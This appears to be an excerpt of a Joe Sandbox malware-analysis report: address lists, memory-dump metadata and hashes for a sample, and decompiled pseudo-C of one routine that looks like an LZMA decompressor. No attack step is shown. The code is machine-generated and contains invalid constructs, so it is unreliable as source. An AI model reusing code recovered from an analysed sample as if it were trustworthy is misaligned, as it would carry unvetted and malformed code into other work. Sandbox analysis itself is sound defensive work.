                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406271
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00406b28
                                                                      0x00000000
                                                                      0x00406b28
                                                                      0x0040697f
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00000000
                                                                      0x00406345
                                                                      0x004062bf
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406557
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x00406579
                                                                      0x00406579
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406586
                                                                      0x00406589
                                                                      0x0040658c
                                                                      0x0040658f
                                                                      0x00406592
                                                                      0x00406594
                                                                      0x0040659b
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x004065a1
                                                                      0x004065a4
                                                                      0x004065a7
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x004065ac
                                                                      0x0040655d
                                                                      0x0040655d
                                                                      0x00406560
                                                                      0x00406563
                                                                      0x0040656d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00000000
                                                                      0x00406690
                                                                      0x0040667b
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
                                                                      0x00406452
                                                                      0x00406455
                                                                      0x0040646d
                                                                      0x00406470
                                                                      0x00406473
                                                                      0x00406476
                                                                      0x00406476
                                                                      0x00406479
                                                                      0x0040647d
                                                                      0x0040647f
                                                                      0x00406457
                                                                      0x00406457
                                                                      0x0040645f
                                                                      0x00406464
                                                                      0x00406466
                                                                      0x00406468
                                                                      0x00406468
                                                                      0x00406482
                                                                      0x00406489
                                                                      0x0040648c
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648e
                                                                      0x00000000
                                                                      0x0040648e
                                                                      0x0040648c
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00406493
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004064ce
                                                                      0x004064ce
                                                                      0x004064d2
                                                                      0x00406ada
                                                                      0x00406ada
                                                                      0x00000000
                                                                      0x00406ada
                                                                      0x004064d8
                                                                      0x004064d8
                                                                      0x004064db
                                                                      0x004064de
                                                                      0x004064e2
                                                                      0x004064e5
                                                                      0x004064eb
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064ed
                                                                      0x004064f0
                                                                      0x004064f3
                                                                      0x004064f3
                                                                      0x004064f9
                                                                      0x00406497
                                                                      0x00406497
                                                                      0x0040649a
                                                                      0x00000000
                                                                      0x0040649a
                                                                      0x004064fb
                                                                      0x004064fb
                                                                      0x004064fe
                                                                      0x00406501
                                                                      0x00406504
                                                                      0x00406507
                                                                      0x0040650a
                                                                      0x0040650d
                                                                      0x00406510
                                                                      0x00406513
                                                                      0x00406516
                                                                      0x00406519
                                                                      0x00406531
                                                                      0x00406534
                                                                      0x00406537
                                                                      0x0040653a
                                                                      0x0040653a
                                                                      0x0040653d
                                                                      0x00406541
                                                                      0x00406543
                                                                      0x0040651b
                                                                      0x0040651b
                                                                      0x00406523
                                                                      0x00406528
                                                                      0x0040652a
                                                                      0x0040652c
                                                                      0x0040652c
                                                                      0x00406546
                                                                      0x0040654d
                                                                      0x00406550
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x00406552
                                                                      0x00000000
                                                                      0x004067df
                                                                      0x004067df
                                                                      0x004067e3
                                                                      0x00406b0a
                                                                      0x00406b0a
                                                                      0x00000000
                                                                      0x00406b0a
                                                                      0x004067e9
                                                                      0x004067e9
                                                                      0x004067ec
                                                                      0x004067ef
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x004067fc
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x004067fe
                                                                      0x00406801
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068ee
                                                                      0x004068ee
                                                                      0x004068f2
                                                                      0x00406914
                                                                      0x00406914
                                                                      0x00406917
                                                                      0x00406921
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x004068f4
                                                                      0x004068f4
                                                                      0x004068f7
                                                                      0x004068fb
                                                                      0x004068fe
                                                                      0x004068fe
                                                                      0x00406901
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069ab
                                                                      0x004069ab
                                                                      0x004069af
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069cd
                                                                      0x004069d4
                                                                      0x004069db
                                                                      0x004069e2
                                                                      0x004069e2
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x004069f6
                                                                      0x004069b1
                                                                      0x004069b1
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069c1
                                                                      0x00406905
                                                                      0x00406905
                                                                      0x00406908
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a9c
                                                                      0x00406a9c
                                                                      0x00406a9f
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x00000000
                                                                      0x004069a6
                                                                      0x00000000
                                                                      0x004066d6
                                                                      0x004066d6
                                                                      0x004066d8
                                                                      0x004066df
                                                                      0x004066e0
                                                                      0x004066e2
                                                                      0x004066e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069e9
                                                                      0x004069e9
                                                                      0x004069ec
                                                                      0x004069f3
                                                                      0x00000000
                                                                      0x004069f6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040671b
                                                                      0x0040671b
                                                                      0x0040671e
                                                                      0x00406754
                                                                      0x00406754
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406884
                                                                      0x00406887
                                                                      0x00406887
                                                                      0x0040688a
                                                                      0x0040688c
                                                                      0x00406b16
                                                                      0x00406b16
                                                                      0x00000000
                                                                      0x00406b16
                                                                      0x00406892
                                                                      0x00406892
                                                                      0x00406895
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040689b
                                                                      0x0040689b
                                                                      0x0040689f
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x004068a2
                                                                      0x00000000
                                                                      0x004068a2
                                                                      0x00406720
                                                                      0x00406720
                                                                      0x00406722
                                                                      0x00406724
                                                                      0x00406726
                                                                      0x00406729
                                                                      0x0040672a
                                                                      0x0040672c
                                                                      0x0040672e
                                                                      0x00406731
                                                                      0x00406734
                                                                      0x0040674a
                                                                      0x0040674a
                                                                      0x0040674f
                                                                      0x00406787
                                                                      0x00406787
                                                                      0x0040678b
                                                                      0x004067b4
                                                                      0x004067b7
                                                                      0x004067b9
                                                                      0x004067c0
                                                                      0x004067c3
                                                                      0x004067c6
                                                                      0x004067c6
                                                                      0x004067cb
                                                                      0x004067cb
                                                                      0x004067cd
                                                                      0x004067d0
                                                                      0x004067d7
                                                                      0x004067da
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x0040680a
                                                                      0x0040680d
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00406881
                                                                      0x00000000
                                                                      0x00406881
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406815
                                                                      0x00406818
                                                                      0x0040681b
                                                                      0x0040681e
                                                                      0x00406821
                                                                      0x00406824
                                                                      0x00406827
                                                                      0x0040682a
                                                                      0x0040682d
                                                                      0x00406830
                                                                      0x00406849
                                                                      0x0040684b
                                                                      0x0040684e
                                                                      0x0040684f
                                                                      0x00406852
                                                                      0x00406854
                                                                      0x00406857
                                                                      0x00406859
                                                                      0x0040685b
                                                                      0x0040685e
                                                                      0x00406860
                                                                      0x00406863
                                                                      0x00406867
                                                                      0x00406869
                                                                      0x00406869
                                                                      0x0040686a
                                                                      0x0040686d
                                                                      0x00406870
                                                                      0x00406832
                                                                      0x00406832
                                                                      0x0040683a
                                                                      0x0040683f
                                                                      0x00406841
                                                                      0x00406844
                                                                      0x00406844
                                                                      0x00406873
                                                                      0x0040687a
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00406804
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687c
                                                                      0x00000000
                                                                      0x0040687c
                                                                      0x0040687a
                                                                      0x0040678d
                                                                      0x0040678d
                                                                      0x00406790
                                                                      0x00406792
                                                                      0x00406795
                                                                      0x00406798
                                                                      0x0040679b
                                                                      0x0040679d
                                                                      0x004067a0
                                                                      0x004067a3
                                                                      0x004067a3
                                                                      0x004067a6
                                                                      0x004067a6
                                                                      0x004067a9
                                                                      0x004067b0
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00406784
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b2
                                                                      0x00000000
                                                                      0x004067b2
                                                                      0x004067b0
                                                                      0x00406736
                                                                      0x00406736
                                                                      0x00406739
                                                                      0x0040673b
                                                                      0x0040673e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040649d
                                                                      0x0040649d
                                                                      0x004064a1
                                                                      0x00406ae6
                                                                      0x00406ae6
                                                                      0x00000000
                                                                      0x00406ae6
                                                                      0x004064a7
                                                                      0x004064a7
                                                                      0x004064aa
                                                                      0x004064ad
                                                                      0x004064b0
                                                                      0x004064b3
                                                                      0x004064b6
                                                                      0x004064b9
                                                                      0x004064bb
                                                                      0x004064be
                                                                      0x004064c1
                                                                      0x004064c4
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x004064c6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406628
                                                                      0x00406628
                                                                      0x0040662c
                                                                      0x00406af2
                                                                      0x00406af2
                                                                      0x00000000
                                                                      0x00406af2
                                                                      0x00406632
                                                                      0x00406632
                                                                      0x00406635
                                                                      0x00406638
                                                                      0x0040663b
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x0040663d
                                                                      0x00406640
                                                                      0x00406643
                                                                      0x00406646
                                                                      0x00406649
                                                                      0x0040664c
                                                                      0x0040664f
                                                                      0x00406650
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406652
                                                                      0x00406655
                                                                      0x00406658
                                                                      0x0040665b
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x0040665e
                                                                      0x00406661
                                                                      0x00406663
                                                                      0x00406663
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a5
                                                                      0x004068a9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068af
                                                                      0x004068af
                                                                      0x004068b2
                                                                      0x004068b5
                                                                      0x004068b8
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068ba
                                                                      0x004068bd
                                                                      0x004068c0
                                                                      0x004068c3
                                                                      0x004068c6
                                                                      0x004068c9
                                                                      0x004068cc
                                                                      0x004068cd
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068cf
                                                                      0x004068d2
                                                                      0x004068d5
                                                                      0x004068d8
                                                                      0x004068db
                                                                      0x004068de
                                                                      0x004068e2
                                                                      0x004068e4
                                                                      0x004068e7
                                                                      0x00000000
                                                                      0x004068e9
                                                                      0x004068e9
                                                                      0x00406666
                                                                      0x00406666
                                                                      0x00000000
                                                                      0x00406666
                                                                      0x004068e7
                                                                      0x00406b1c
                                                                      0x00406b1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00406b53
                                                                      0x00406b53
                                                                      0x00000000
                                                                      0x00406b53
                                                                      0x004069a0
                                                                      0x00406a20
                                                                      0x004069e9

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                                      • Instruction ID: b3fba2513e78c155f0b266b50acf783dae1ce9585f0b47354f4c941ebe2136ae
                                                                      • Opcode Fuzzy Hash: 21de50892f659123e4fedba565e9e2413225c8e826dcfa90f57619bb85df476e
                                                                      • Instruction Fuzzy Hash: 76A13071E00229CBDF28CFA8C8447ADBBB1FB44305F15816AD816BB281D7789A96DF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004068EE Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E004068EE() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406B5B))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
